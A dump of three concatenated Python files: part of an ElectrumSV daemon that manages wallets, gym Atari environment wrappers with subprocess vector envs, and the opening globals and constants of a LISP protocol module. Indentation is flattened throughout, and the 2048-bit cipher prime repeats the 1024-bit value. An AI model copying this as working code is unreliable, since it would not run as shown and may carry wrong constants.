if hasattr(app_state, 'windows'):
path = config.get_cmdline_wallet_filepath()
app_state.app.new_window(path, config.get('url'))
return "ok"
return "error: ElectrumSV is running in daemon mode; stop the daemon first."
def load_wallet(self, wallet_filepath: str) -> Optional[Wallet]:
# wizard will be launched if we return
if wallet_filepath in self.wallets:
wallet = self.wallets[wallet_filepath]
return wallet
if not WalletStorage.files_are_matched_by_path(wallet_filepath):
return None
storage = WalletStorage(wallet_filepath)
if storage.requires_split():
storage.close()
            logger.debug("Wallet '%s' requires a split", wallet_filepath)
return None
if storage.requires_upgrade():
storage.close()
logger.debug("Wallet '%s' requires an upgrade", wallet_filepath)
return None
wallet = Wallet(storage)
self.start_wallet(wallet)
return wallet
def get_wallet(self, path: str) -> Optional[Wallet]:
wallet_filepath = WalletStorage.canonical_path(path)
return self.wallets.get(wallet_filepath)
def start_wallet(self, wallet: Wallet) -> None:
# We expect the storage path to be exact, including the database extension. So it should
# match the canonical path used elsewhere.
self.wallets[wallet.get_storage_path()] = wallet
wallet.start(self.network)
def stop_wallet_at_path(self, path: str) -> None:
wallet_filepath = WalletStorage.canonical_path(path)
# Issue #659 wallet may already be stopped.
if wallet_filepath in self.wallets:
wallet = self.wallets.pop(wallet_filepath)
wallet.stop()
def stop_wallets(self):
for path in list(self.wallets.keys()):
self.stop_wallet_at_path(path)
def run_cmdline(self, config_options: dict) -> Any:
password = config_options.get('password')
new_password = config_options.get('new_password')
config = SimpleConfig(config_options)
cmdname = config.get('cmd')
cmd = known_commands[cmdname]
if cmd.requires_wallet:
cmdline_wallet_filepath = config.get_cmdline_wallet_filepath()
assert cmdline_wallet_filepath is not None
wallet_path = WalletStorage.canonical_path(cmdline_wallet_filepath)
wallet = self.wallets.get(wallet_path)
if wallet is None:
return {'error': 'Wallet "%s" is not loaded. Use "electrum-sv daemon load_wallet"'
% get_wallet_name_from_path(wallet_path)}
else:
wallet = None
# arguments passed to function
args = [config.get(x) for x in cmd.params]
# decode json arguments
args = [json_decode(i) for i in args]
# options
kwargs = {}
for x in cmd.options:
kwargs[x] = (config_options.get(x) if x in ['password', 'new_password']
else config.get(x))
cmd_runner = Commands(config, wallet, self.network)
func = getattr(cmd_runner, cmd.name)
result = func(*args, **kwargs)
return result
def on_stop(self):
if self.rest_server and self.rest_server.is_alive:
app_state.async_.spawn_and_wait(self.rest_server.stop)
self.logger.debug("stopped.")
def launch_restapi(self):
if not self.rest_server.is_alive:
self._restapi_future = app_state.async_.spawn(self.rest_server.launcher)
self.rest_server.is_alive = True
def run(self) -> None:
if app_state.config.get("restapi"):
self.launch_restapi()
while self.is_running():
self.server.handle_request() if self.server else time.sleep(0.1)
logger.warning("no longer running")
if self.network:
logger.warning("wait for network shutdown")
assert self.fx_task is not None, "fx task should be valid if network is"
self.fx_task.cancel()
app_state.async_.spawn_and_wait(self.network.shutdown_wait)
self.on_stop()
def stop(self) -> None:
logger.warning("stopping")
super().stop()
self.stop_wallets()
remove_lockfile(get_lockfile(self.config))
|
atari_wrappers.py
|
import gym
import numpy as np
from collections import deque
from PIL import Image
from multiprocessing import Process, Pipe
# atari_wrappers.py
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def _reset(self):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset()
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(0)
if done:
obs = self.env.reset()
return obs
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def _reset(self):
self.env.reset()
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset()
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset()
return obs
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def _step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
            # for Qbert, sometimes we stay in the lives == 0 condition for a few
            # frames, so it's important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def _reset(self):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset()
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = deque(maxlen=2)
self._skip = skip
def _step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for _ in range(self._skip):
obs, reward, done, info = self.env.step(action)
self._obs_buffer.append(obs)
total_reward += reward
if done:
break
max_frame = np.max(np.stack(self._obs_buffer), axis=0)
return max_frame, total_reward, done, info
def _reset(self):
"""Clear past frame buffer and init. to first obs. from inner env."""
self._obs_buffer.clear()
obs = self.env.reset()
self._obs_buffer.append(obs)
return obs
class ClipRewardEnv(gym.RewardWrapper):
def _reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env):
"""Warp frames to 84x84 as done in the Nature paper and later work."""
gym.ObservationWrapper.__init__(self, env)
self.res = 84
self.observation_space = gym.spaces.Box(low=0, high=255, shape=(self.res, self.res, 1), dtype='uint8')
def _observation(self, obs):
frame = np.dot(obs.astype('float32'), np.array([0.299, 0.587, 0.114], 'float32'))
frame = np.array(Image.fromarray(frame).resize((self.res, self.res),
resample=Image.BILINEAR), dtype=np.uint8)
return frame.reshape((self.res, self.res, 1))
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Buffer observations and stack across channels (last axis)."""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
assert shp[2] == 1 # can only stack 1-channel frames
self.observation_space = gym.spaces.Box(low=0, high=255, shape=(shp[0], shp[1], k), dtype='uint8')
def _reset(self):
"""Clear buffer and re-fill by duplicating the first observation."""
ob = self.env.reset()
for _ in range(self.k): self.frames.append(ob)
return self._observation()
def _step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._observation(), reward, done, info
def _observation(self):
assert len(self.frames) == self.k
return np.concatenate(self.frames, axis=2)
def wrap_deepmind(env, episode_life=True, clip_rewards=True):
"""Configure environment for DeepMind-style Atari.
Note: this does not include frame stacking!"""
assert 'NoFrameskip' in env.spec.id # required for DeepMind-style skip
if episode_life:
env = EpisodicLifeEnv(env)
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
return env
# envs.py
def make_env(env_id, seed, rank):
def _thunk():
env = gym.make(env_id)
env.seed(seed + rank)
env = wrap_deepmind(env)
env = WrapPyTorch(env)
return env
return _thunk
class WrapPyTorch(gym.ObservationWrapper):
def __init__(self, env=None):
super(WrapPyTorch, self).__init__(env)
self.observation_space = gym.spaces.Box(0.0, 1.0, [1, 84, 84], dtype='float32')
def _observation(self, observation):
return observation.transpose(2, 0, 1)
# vecenv.py
class VecEnv(object):
"""
Vectorized environment base class
"""
def step(self, vac):
"""
Apply sequence of actions to sequence of environments
actions -> (observations, rewards, news)
where 'news' is a boolean vector indicating whether each element is new.
"""
raise NotImplementedError
def reset(self):
"""
Reset all environments
"""
raise NotImplementedError
def close(self):
pass
# subproc_vec_env.py
def worker(remote, env_fn_wrapper):
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.action_space, env.observation_space))
else:
raise NotImplementedError
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(VecEnv):
def __init__(self, env_fns):
"""
envs: list of gym environments to run in subprocesses
"""
nenvs = len(env_fns)
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
self.ps = [Process(target=worker, args=(work_remote, CloudpickleWrapper(env_fn)))
for (work_remote, env_fn) in zip(self.work_remotes, env_fns)]
for p in self.ps:
p.start()
self.remotes[0].send(('get_spaces', None))
self.action_space, self.observation_space = self.remotes[0].recv()
def step(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
results = [remote.recv() for remote in self.remotes]
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
@property
def num_envs(self):
return len(self.remotes)
# Create the environment.
def make(env_name, num_processes):
envs = SubprocVecEnv([
make_env(env_name, 1337, i) for i in range(num_processes)
])
return envs
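# A minimal usage sketch, not part of the original module. It assumes an older
# gym release where wrappers implement _reset/_step, and that the Atari env id
# "PongNoFrameskip-v4" is available.
if __name__ == "__main__":
    envs = make("PongNoFrameskip-v4", num_processes=2)
    obs = envs.reset()
    print(obs.shape)  # expected (2, 1, 84, 84): 2 envs, CHW frames
    actions = [envs.action_space.sample() for _ in range(envs.num_envs)]
    obs, rewards, dones, infos = envs.step(actions)
    envs.close()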
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. The first dictionary array is indexed by device name
# and the second one holds lisp_interface() values indexed by an instance-id
# string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time the g, p, and public-key values are created. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachable-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag indicates that when a map-cache
# entry is created or updated, we write specific information to, say, a
# Broadcom chip that will do VXLAN encapsulation. This is a way to get
# existing hardware to do L3 overlays with the LISP control-plane when all
# it supports is VXLAN. See lisp_program_vxlan_hardware().
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# the hostname sent in an Info-Request; the value is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests. When the process
# starts up or the map-cache is cleared by the user, we don't do rate-limiting
# for 1 minute so we can load up the cache more quickly.
#
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time.time()
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll hash the first long of an ICMP echo-request and
# echo-reply for testing purposes, to show per-packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# an EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
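# For example (hypothetical values), a subscription from ITR 2.2.2.2 for the
# EID-prefix 10.0.0.0/8 in instance-ID 1000 would be keyed roughly like:
#
# >>> lisp_pubsub_cache["[1000]10.0.0.0/8"]["2.2.2.2"] = <subscription state>
#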
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends are
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends are looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
lisp_ms_json_keys = {}
#
# Used to store NAT-translated address state in an RTR when an ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error processing called from lisp_rtr_data_plane(), then it
# can return a partially filled LISP-Trace packet to the ltr client that
# sits behind a NAT device.
#
# Dictionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If keywords are not in dictionary array, the value is
# wildcarded. The values for eid-prefix, group-prefix and rloc-prefix are
# lisp_address() instances so longest-match lookups can be performed. The
# instance-id value is an array of 2 elements that stores the same value in
# both elements if not a range, or else the low and high range values.
#
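# For example (hypothetical values), one configured entry could look like the
# following, where the prefixes are stored as lisp_address() instances and an
# instance-id range of [1000, 1000] means the single instance-ID 1000:
#
# >>> lisp_glean_mappings.append({ "eid-prefix" : <lisp_address 10.0.0.0/8>,
# ... "rloc-prefix" : <lisp_address 192.168.1.0/24>, "instance-id" : [1000, 1000] })
#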
lisp_glean_mappings = []
#
# Gleaned groups data structure. Used to find all (S,G) and (*,G) the gleaned
# EID has joined. This data structure will be used to time out entries that
# have stopped joining. In that case, the RLE is removed from the (S,G) or
# (*,G) whose join timed out.
#
# The dictionary array is indexed by "[<iid>]<eid>" and the value field is a
# dictionary array indexed by group address string. The value of the nested
# dictionary array is a timestamp. When EID 1.1.1.1 has joined groups 224.1.1.1,
# and 224.2.2.2, here is how timestamp 1111 and 2222 are stored.
#
# >>> lisp_gleaned_groups = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"] = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.1.1.1"] = 1111
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.2.2.2"] = 2222
# >>> lisp_gleaned_groups
# {'[1539]1.1.1.1': {'224.2.2.2': 2222, '224.1.1.1': 1111}}
#
lisp_gleaned_groups = {}
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMAC alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_TEST_MR_INTERVAL = 60 # In units of seconds, 1 minute
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = .5 # In units of seconds, 500 ms
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60 # In units of seconds, 1 minute
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180 # In units of seconds, 3 minutes
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
